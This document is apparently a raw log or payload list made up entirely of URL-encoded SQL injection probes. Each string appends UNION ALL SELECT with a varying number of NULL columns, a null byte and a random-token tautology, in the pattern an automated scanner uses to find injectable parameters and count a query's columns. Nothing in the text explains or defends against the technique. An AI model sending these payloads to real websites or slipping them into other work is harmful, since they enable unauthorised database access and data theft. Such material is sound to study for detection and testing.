1234.5%27%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%28%27VdKQ%27%3D%27VdKQ 1234.5%27%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%28%27TVbF%27%3D%27TVbF 1234.5%27%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%28%27FmQh%27%3D%27FmQh 1234.5%27%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%28%28%27bzZl%27%3D%27bzZl 1234.5%27%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%28%28%27qdpf%27%3D%27qdpf 1234.5%27%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%28%28%27RBer%27%3D%27RBer 1234.5%27%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%28%28%27NWDl%27%3D%27NWDl 1234.5%27%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%28%28%27Gslk%27%3D%27Gslk 1234.5%27%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%28%28%27qTNa%27%3D%27qTNa 1234.5%27%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%28%28%27GNPu%27%3D%27GNPu 1234.5%27%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%28%28%27zCFv%27%3D%27zCFv 1234.5%27%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%28%28%27Dtrt%27%3D%27Dtrt 1234.5%27%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%28%28%27bObq%27%3D%27bObq 1234.5%27%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%28%28%28%27IMRX%27%3D%27IMRX 1234.5%27%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%28%28%28%27EYoh%27%3D%27EYoh 1234.5%27%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%28%28%28%27eEDV%27%3D%27eEDV 1234.5%27%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%28%28%28%27EMkl%27%3D%27EMkl 1234.5%27%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%28%28%28%27wysK%27%3D%27wysK 1234.5%27%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%28%28%28%27fmyG%27%3D%27fmyG 1234.5%27%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%28%28%28%27PpRe%27%3D%27PpRe 1234.5%27%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%28%28%28%27pYvU%27%3D%27pYvU 1234.5%27%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%28%28%28%27tBBb%27%3D%27tBBb 1234.5%27%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%28%28%28%27Godg%27%3D%27Godg 1234.5%27%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%27gdqM%27%3D%27gdqM 1234.5%27%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%27nOsE%27%3D%27nOsE 1234.5%27%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%27Drbr%27%3D%27Drbr 1234.5%27%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%27Wgml%27%3D%27Wgml 1234.5%27%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%27nDrl%27%3D%27nDrl 1234.5%27%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%27cjIB%27%3D%27cjIB 1234.5%27%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%27WFVL%27%3D%27WFVL 1234.5%27%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%27WBPS%27%3D%27WBPS 1234.5%27%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%27KuYi%27%3D%27KuYi 1234.5%27%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%27IQSp%27%3D%27IQSp 1234.5%27%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%28%27xxyb%27%20LIKE%20%27xxyb 1234.5%27%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%28%27VOCj%27%20LIKE%20%27VOCj 1234.5%27%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%28%27ayge%27%20LIKE%20%27ayge 1234.5%27%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%28%27NFSA%27%20LIKE%20%27NFSA 1234.5%27%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%28%27MqZD%27%20LIKE%20%27MqZD 1234.5%27%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%28%27dtBJ%27%20LIKE%20%27dtBJ 1234.5%27%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%28%27Hwno%27%20LIKE%20%27Hwno 1234.5%27%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%28%27PdHM%27%20LIKE%20%27PdHM 1234.5%27%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%28%27pRVE%27%20LIKE%20%27pRVE 1234.5%27%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%28%27XeSK%27%20LIKE%20%27XeSK 1234.5%27%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%28%28%27WJou%27%20LIKE%20%27WJou 1234.5%27%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%28%28%27xlWk%27%20LIKE%20%27xlWk 1234.5%27%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%28%28%27thzO%27%20LIKE%20%27thzO 1234.5%27%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%28%28%27XDIs%27%20LIKE%20%27XDIs 1234.5%27%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%28%28%27icAt%27%20LIKE%20%27icAt 1234.5%27%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%28%28%27jwgV%27%20LIKE%20%27jwgV 1234.5%27%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%28%28%27ZfhK%27%20LIKE%20%27ZfhK 1234.5%27%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%28%28%27shRi%27%20LIKE%20%27shRi 1234.5%27%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%28%28%27SGLf%27%20LIKE%20%27SGLf 1234.5%27%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%28%28%27jkvJ%27%20LIKE%20%27jkvJ 1234.5%27%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%28%28%28%27LIWs%27%20LIKE%20%27LIWs 1234.5%27%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%28%28%28%27rUnx%27%20LIKE%20%27rUnx 1234.5%27%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%28%28%28%27VvXZ%27%20LIKE%20%27VvXZ 1234.5%27%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%28%28%28%27GDoS%27%20LIKE%20%27GDoS 1234.5%27%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%28%28%28%27aaXR%27%20LIKE%20%27aaXR 1234.5%27%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%28%28%28%27ytOe%27%20LIKE%20%27ytOe 1234.5%27%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%28%28%28%27OKis%27%20LIKE%20%27OKis 1234.5%27%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%28%28%28%27eCdY%27%20LIKE%20%27eCdY 1234.5%27%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%28%28%28%27fZau%27%20LIKE%20%27fZau 1234.5%27%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%28%28%28%27mhlc%27%20LIKE%20%27mhlc 1234.5%27%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%27uwfO%27%20LIKE%20%27uwfO 1234.5%27%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%27XMin%27%20LIKE%20%27XMin 1234.5%27%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%27ngUC%27%20LIKE%20%27ngUC 1234.5%27%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%27oUtu%27%20LIKE%20%27oUtu 1234.5%27%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%27vFhf%27%20LIKE%20%27vFhf 1234.5%27%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%27Edii%27%20LIKE%20%27Edii 1234.5%27%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%27LYJx%27%20LIKE%20%27LYJx 1234.5%27%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%27vNhC%27%20LIKE%20%27vNhC 1234.5%27%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%27BZth%27%20LIKE%20%27BZth 1234.5%27%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%27gVwx%27%20LIKE%20%27gVwx 1234.5%22%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%28%22BRAJ%22%3D%22BRAJ 1234.5%22%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%28%22uMZY%22%3D%22uMZY 1234.5%22%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%28%22DRKk%22%3D%22DRKk 1234.5%22%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%28%22bATE%22%3D%22bATE 1234.5%22%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%28%22CDwL%22%3D%22CDwL 1234.5%22%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%28%22KYXv%22%3D%22KYXv 1234.5%22%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%28%22bTbC%22%3D%22bTbC 1234.5%22%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%28%22fRJs%22%3D%22fRJs 1234.5%22%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%28%22uHxj%22%3D%22uHxj 1234.5%22%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%28%22Lgxg%22%3D%22Lgxg 1234.5%22%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%28%28%22NLXV%22%3D%22NLXV 